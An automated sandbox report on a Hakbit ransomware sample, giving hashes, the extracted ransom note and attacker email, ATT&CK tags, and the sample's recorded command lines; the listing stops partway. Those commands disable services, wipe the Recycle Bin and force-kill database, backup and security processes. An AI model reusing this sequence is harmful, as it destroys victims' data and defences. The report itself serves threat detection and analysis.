hakbit | 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b

General

Target

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Size

80KB
MD5

8152a3d0d76f7e968597f4f834fdfa9d
SHA1

c3cf05f3f79851d3c0d4266ab77c8e3e3f88c73e
SHA256

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b
SHA512

eb1a18cb03131466a4152fa2f6874b70c760317148684ca9b95044e50dc9cd19316d6e68e680ce18599114ba73e75264de5dab5afe611165b9c6c0b5f01002b4

Score

10^/10

hakbit ransomware spyware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Family

hakbit

Ransom Note

To recover your data contact the email below potentialenergy@mail.ru Key Identifier: M13QXKon7C2hkmKC2rgNCHGj5mjFsrhjl+ySO6RMmlJPOxmPQlUIJq2A78fYplgtNaKD0yMxcUuZ4Xhc6NjsXaRiUda+D9j2akL4mdsBmcdpDY/oBfmrGkd/F7D2XYLWs+BrcrGuTNuJkT2MrA9ClBuFN+Qn4imadXWf83wdDThSgRupEt8+3no5Q04HrGM1psRfpqWz1LLmjSKkSojdEtcwpmMul1OTxbtGcy2kVFcnk8+J6bflIhtnwJiauBC0+N7hmGE22aR24kFhZLzlU7e07AwuMa0LBp8Rm+XqLJD/01WUAYDTjv4L+6rmFPXyQx5dl+DE6eJ0yYbH0V5ufZ11q/Ifol3niHIo2ZtDJTdMpPlyH9no4/GU2Yf90GPSozBVGh3c5W4PR3AwMjWXKfX1Zh8acH6BeVJHVbiXLznCsGZNo5PVCkEVH64d39d3HEzN3mA6WUipKiA0dbTxyIyw+gf5hBScbsidlnxhCu9GS95p6hmdR1t8Lskc3vUP1zgrq+G89FCqvipwMN1MiABUhTHyMLvkl3HfmL7EutwJX8JnJPJqnI98nFG1rNx9dIe8Xo1MaiAmq0j61XJTpOe42Ll7+Ui+LooUHbMbpBJ/BUBaaRkdHZId+52teVRQ9wHoLtis+ZqcLt9u4U2GQJHQam7O/N99JxI0quEElNc= Number of files that were processed is: 406

Emails

potentialenergy@mail.ru

Signatures

Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
ransomware hakbit

Modifies extensions of user files 1 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\GrantRestore.tiff	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1856 cmd.exe

pid	process
1856	cmd.exe

Drops startup file 1 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 47 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2536	taskkill.exe
2564	taskkill.exe
1800	taskkill.exe
1272	taskkill.exe
672	taskkill.exe
1820	taskkill.exe
1564	taskkill.exe
2216	taskkill.exe
396	taskkill.exe
2124	taskkill.exe
2248	taskkill.exe
2612	taskkill.exe
828	taskkill.exe
2164	taskkill.exe
2200	taskkill.exe
2424	taskkill.exe
2672	taskkill.exe
1804	taskkill.exe
2084	taskkill.exe
1928	taskkill.exe
1980	taskkill.exe
856	taskkill.exe
1688	taskkill.exe
624	taskkill.exe
1084	taskkill.exe
2496	taskkill.exe
2264	taskkill.exe
2468	taskkill.exe
1660	taskkill.exe
1668	taskkill.exe
2040	taskkill.exe
1420	taskkill.exe
112	taskkill.exe
2052	taskkill.exe
2520	taskkill.exe
2364	taskkill.exe
2636	taskkill.exe
1916	taskkill.exe
2016	taskkill.exe
968	taskkill.exe
2288	taskkill.exe
2340	taskkill.exe
2392	taskkill.exe
1552	taskkill.exe
1572	taskkill.exe
1408	taskkill.exe
2588	taskkill.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

1372 notepad.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2632 PING.EXE

pid	process
1372	notepad.exe

pid	process
2632	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

pid	process
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Token: SeDebugPrivilege	1660	taskkill.exe
Token: SeDebugPrivilege	828	taskkill.exe
Token: SeDebugPrivilege	1980	taskkill.exe
Token: SeDebugPrivilege	1800	taskkill.exe
Token: SeDebugPrivilege	1272	taskkill.exe
Token: SeDebugPrivilege	2040	taskkill.exe
Token: SeDebugPrivilege	856	taskkill.exe
Token: SeDebugPrivilege	1408	taskkill.exe
Token: SeDebugPrivilege	2084	taskkill.exe
Token: SeDebugPrivilege	1916	taskkill.exe
Token: SeDebugPrivilege	1420	taskkill.exe
Token: SeDebugPrivilege	1688	taskkill.exe
Token: SeDebugPrivilege	2264	taskkill.exe
Token: SeDebugPrivilege	2520	taskkill.exe
Token: SeDebugPrivilege	1668	taskkill.exe
Token: SeDebugPrivilege	2288	taskkill.exe
Token: SeDebugPrivilege	1804	taskkill.exe
Token: SeDebugPrivilege	2364	taskkill.exe
Token: SeDebugPrivilege	396	taskkill.exe
Token: SeDebugPrivilege	2564	taskkill.exe
Token: SeDebugPrivilege	2536	taskkill.exe
Token: SeDebugPrivilege	2392	taskkill.exe
Token: SeDebugPrivilege	2340	taskkill.exe
Token: SeDebugPrivilege	1564	taskkill.exe
Token: SeDebugPrivilege	2164	taskkill.exe
Token: SeDebugPrivilege	672	taskkill.exe
Token: SeDebugPrivilege	2496	taskkill.exe
Token: SeDebugPrivilege	112	taskkill.exe
Token: SeDebugPrivilege	2052	taskkill.exe
Token: SeDebugPrivilege	2672	taskkill.exe
Token: SeDebugPrivilege	1820	taskkill.exe
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	1084	taskkill.exe
Token: SeDebugPrivilege	2612	taskkill.exe
Token: SeDebugPrivilege	2424	taskkill.exe
Token: SeDebugPrivilege	2016	taskkill.exe
Token: SeDebugPrivilege	2636	taskkill.exe
Token: SeDebugPrivilege	2124	taskkill.exe
Token: SeDebugPrivilege	2216	taskkill.exe
Token: SeDebugPrivilege	1572	taskkill.exe
Token: SeDebugPrivilege	2588	taskkill.exe
Token: SeDebugPrivilege	1928	taskkill.exe
Token: SeDebugPrivilege	968	taskkill.exe
Token: SeDebugPrivilege	1552	taskkill.exe
Token: SeDebugPrivilege	2248	taskkill.exe
Token: SeDebugPrivilege	2200	taskkill.exe
Token: SeDebugPrivilege	2468	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

pid process

316 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

pid process

316 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

description	pid	process	target process
PID 316 wrote to memory of 1852	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 316 wrote to memory of 1852	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 316 wrote to memory of 1852	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 316 wrote to memory of 1872	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 316 wrote to memory of 1872	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 316 wrote to memory of 1872	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 316 wrote to memory of 1888	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 316 wrote to memory of 1888	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 316 wrote to memory of 1888	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 316 wrote to memory of 1212	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 316 wrote to memory of 1212	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 316 wrote to memory of 1212	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 316 wrote to memory of 1876	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	cmd.exe
PID 316 wrote to memory of 1876	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	cmd.exe
PID 316 wrote to memory of 1876	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	cmd.exe
PID 316 wrote to memory of 1800	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1800	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1800	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1660	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1660	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1660	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1668	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1668	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1668	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1552	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1552	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1552	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1572	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1572	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1572	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1916	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1916	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1916	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1928	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1928	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1928	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 2016	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 2016	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 2016	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1980	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1980	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1980	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 828	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 828	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 828	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1272	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1272	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1272	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 856	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 856	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 856	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 2040	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 2040	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 2040	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1408	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1408	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1408	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 968	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 968	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 968	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 672	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 672	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 672	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 316 wrote to memory of 1688	316	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
"C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:316

C:\Windows\system32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
2⤵
PID:1852

C:\Windows\system32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:1872

C:\Windows\system32\sc.exe
"sc.exe" config SQLWriter start= disabled
2⤵
PID:1888

C:\Windows\system32\sc.exe
"sc.exe" config SstpSvc start= disabled
2⤵
PID:1212

C:\Windows\system32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
2⤵
PID:1876

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1800

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1660

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1668

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1552

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1572

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1916

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1928

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2016

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM steam.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:828

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM excel.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1272

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:856

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2040

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1408

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:968

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:672

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1688

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1420

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:396

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:112

C:\Windows\system32\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
2⤵
- Kills process with taskkill
PID:624

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1820

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1084

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1564

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1804

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2052

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2084

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2124

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2164

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
2⤵
